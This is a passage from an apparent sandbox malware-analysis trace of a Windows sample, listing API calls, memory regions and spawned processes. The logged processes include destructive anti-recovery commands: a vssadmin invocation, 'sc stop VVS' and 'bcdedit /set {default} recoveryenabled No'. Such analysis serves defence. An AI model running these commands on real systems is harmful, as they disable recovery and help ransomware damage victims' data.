lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0022.091] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0022.092] GetConsoleTitleW (in: lpConsoleTitle=0x5e2e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0022.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0022.092] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0022.092] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0022.092] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0022.093] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0022.093] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0022.093] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0022.093] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0022.093] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0022.093] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0022.093] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0022.094] GetConsoleTitleW (in: lpConsoleTitle=0x34f328, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0022.094] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0022.094] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0022.094] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0022.094] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0022.094] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0022.094] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0022.094] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0022.094] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0022.095] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0022.095] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0022.095] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0022.095] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0022.095] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0022.095] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0022.095] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0022.095] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0022.095] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0022.095] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0022.095] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0022.095] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0022.095] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0022.095] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0022.095] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0022.095] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0022.095] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0022.095] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0022.095] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0022.095] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0022.095] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0022.095] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0022.095] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0022.095] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0022.095] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0022.095] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0022.095] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0022.095] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0022.095] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0022.095] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0022.095] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0022.095] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0022.095] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0022.095] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0022.095] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0022.095] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0022.095] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0022.095] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0022.095] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0022.095] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0022.095] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0022.095] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0022.095] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0022.095] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0022.095] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0022.095] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0022.095] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0022.095] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0022.095] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0022.095] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0022.095] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0022.096] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0022.096] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0022.096] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0022.096] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0022.096] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0022.096] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0022.096] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0022.096] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0022.096] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0022.096] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0022.096] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0022.096] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0022.096] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0022.096] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0022.096] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0022.096] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0022.096] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0022.096] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0022.096] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0022.096] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0022.096] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0022.096] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0022.096] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0022.096] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0022.096] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0022.096] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0022.096] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0022.096] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0022.096] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0022.096] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0022.097] SetErrorMode (uMode=0x0) returned 0x0 [0022.097] SetErrorMode (uMode=0x1) returned 0x0 [0022.097] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5d07f8, lpFilePart=0x34ee48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34ee48*="Desktop") returned 0x25 [0022.097] SetErrorMode (uMode=0x0) returned 0x1 [0022.097] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0022.097] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0022.100] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0022.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.101] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x34ebe4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ebe4) returned 0xffffffff [0022.101] GetLastError () returned 0x2 [0022.101] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x34ebc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ebc4) returned 0xffffffff [0022.101] GetLastError () returned 0x2 [0022.101] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x34ebc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ebc4) returned 0xffffffff [0022.101] GetLastError () returned 0x2 [0022.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.101] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x34ebe4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ebe4) returned 0x5e3540 [0022.102] FindClose (in: hFindFile=0x5e3540 | out: hFindFile=0x5e3540) returned 1 [0022.102] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0022.102] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0022.102] GetConsoleTitleW (in: lpConsoleTitle=0x34f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0022.102] InitializeProcThreadAttributeList (in: lpAttributeList=0x34ef44, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34f00c | out: lpAttributeList=0x34ef44, lpSize=0x34f00c) returned 1 [0022.102] UpdateProcThreadAttribute (in: lpAttributeList=0x34ef44, dwFlags=0x0, Attribute=0x60001, lpValue=0x34f004, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34ef44, lpPreviousValue=0x0) returned 1 [0022.102] GetStartupInfoW (in: lpStartupInfo=0x34ef00 | out: lpStartupInfo=0x34ef00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0022.114] CloseHandle (hObject=0x74) returned 1 [0022.114] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0022.114] GetEnvironmentStringsW () returned 0x5e5f30* [0022.114] FreeEnvironmentStringsW (penv=0x5e5f30) returned 1 [0022.114] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0024.684] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x34eee0 | out: lpExitCode=0x34eee0*=0x2) returned 1 [0024.684] CloseHandle (hObject=0x78) returned 1 [0024.685] _vsnwprintf (in: _Buffer=0x34f028, _BufferCount=0x13, _Format="%08X", _ArgList=0x34eeec | out: _Buffer="00000002") returned 8 [0024.685] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0024.685] GetEnvironmentStringsW () returned 0x5e40f0* [0024.685] FreeEnvironmentStringsW (penv=0x5e40f0) returned 1 [0024.685] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0024.685] GetEnvironmentStringsW () returned 0x5e40f0* [0024.685] FreeEnvironmentStringsW (penv=0x5e40f0) returned 1 [0024.685] DeleteProcThreadAttributeList (in: lpAttributeList=0x34ef44 | out: lpAttributeList=0x34ef44) [0024.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0024.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0024.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0024.685] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0024.685] _get_osfhandle (_FileHandle=0) returned 0x3 [0024.685] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0024.686] SetConsoleInputExeNameW () returned 0x1 [0024.686] GetConsoleOutputCP () returned 0x1b5 [0024.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0024.686] SetThreadUILanguage (LangId=0x0) returned 0x409 [0024.686] exit (_Code=2) Process: id = "13" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x6489a000" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa1c" cmd_line = "sc stop VVS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 822 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 823 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 824 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 825 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 826 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 827 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 828 start_va = 0x180000 end_va = 0x18bfff entry_point = 0x187997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 829 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 830 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 831 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 832 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 833 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 834 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 835 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 836 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 837 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 838 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 839 start_va = 0x340000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 840 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 841 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 842 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 843 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 844 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 845 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 846 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 847 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 848 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 849 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 850 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 851 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 852 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 853 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 854 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 855 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 856 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 857 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 858 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 859 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 932 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 933 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 934 start_va = 0x250000 end_va = 0x30ffff entry_point = 0x250000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 935 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x140000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 36 os_tid = 0xb08 [0021.459] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfea4 | out: lpSystemTimeAsFileTime=0xcfea4*(dwLowDateTime=0x14648180, dwHighDateTime=0x1d35d7b)) [0021.459] GetCurrentProcessId () returned 0xb04 [0021.459] GetCurrentThreadId () returned 0xb08 [0021.459] GetTickCount () returned 0x147c8 [0021.459] QueryPerformanceCounter (in: lpPerformanceCount=0xcfe9c | out: lpPerformanceCount=0xcfe9c*=324950163) returned 1 [0021.459] GetModuleHandleA (lpModuleName=0x0) returned 0x180000 [0021.459] __set_app_type (_Type=0x1) [0021.459] __p__fmode () returned 0x76d831f4 [0021.459] __p__commode () returned 0x76d831fc [0021.459] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1879c7) returned 0x0 [0021.459] __wgetmainargs (in: _Argc=0x189020, _Argv=0x189028, _Env=0x189024, _DoWildCard=0, _StartInfo=0x189034 | out: _Argc=0x189020, _Argv=0x189028, _Env=0x189024) returned 0 [0021.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.462] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0021.462] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0021.462] _wcsicmp (_String1="stop", _String2="query") returned 2 [0021.462] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0021.462] _wcsicmp (_String1="stop", _String2="start") returned 14 [0021.462] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0021.462] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0021.462] _wcsicmp (_String1="stop", _String2="control") returned 16 [0021.462] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0021.462] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0021.463] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4bf738 [0021.464] OpenServiceW (hSCManager=0x4bf738, lpServiceName="VVS", dwDesiredAccess=0x20) returned 0x0 [0021.464] GetLastError () returned 0x424 [0021.464] _itow (in: _Dest=0x424, _Radix=851260 | out: _Dest=0x424) returned="1060" [0021.464] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x189380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0021.467] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xcfd24, nSize=0x2, Arguments=0xcfd30 | out: lpBuffer="ᦀL\x01") returned 0x62 [0021.485] GetFileType (hFile=0x7) returned 0x2 [0021.485] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xcfcf8 | out: lpMode=0xcfcf8) returned 1 [0021.485] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4c1980*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xcfd14, lpReserved=0x0 | out: lpBuffer=0x4c1980*, lpNumberOfCharsWritten=0xcfd14*=0x62) returned 1 [0021.486] LocalFree (hMem=0x4c1980) returned 0x0 [0021.486] LocalFree (hMem=0x0) returned 0x0 [0021.486] CloseServiceHandle (hSCObject=0x4bf738) returned 1 [0021.520] exit (_Code=1060) Thread: id = 41 os_tid = 0xb44 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x63de8000" os_pid = "0xb14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 907 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 908 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 909 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 910 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 911 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 912 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 913 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 914 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 915 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 916 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 917 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename 